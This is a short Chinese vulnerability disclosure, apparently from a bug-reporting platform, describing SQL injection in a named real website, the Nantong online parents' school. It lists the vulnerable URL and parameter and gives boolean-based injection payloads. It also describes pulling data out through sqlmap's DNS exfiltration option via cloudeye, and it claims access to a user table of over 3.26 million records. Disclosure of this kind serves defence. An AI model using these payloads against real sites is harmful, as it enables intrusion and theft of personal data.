南通网上家长学校SQL注入（cloudeye结合sqlmap返显/涉及326W+用户信息）

南通网上家长学校SQL注入(cloudeye结合sqlmap返显/涉及326W+用户信息)

目标：http://www.ntjxt.com检测发现以下地方存在SQL注入：(注入参数news_title，布尔注入/cloudeye返显)

http://www.ntjxt.com/areas/result?news_title=十一五&area=10&type=1

Payload：

http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=1 and '%'='&area=10&type=1

http://www.ntjxt.com/areas/result?news_title=十一五%' and 1=2 and '%'='&area=10&type=1

发现是Oracle数据库，于是直接在cloudeye主机上调用sqlmap的--dns-domain参数，可快速返显~

1、当前数据库用户

2、所有数据库

3、用户表，涉及326W+用户信息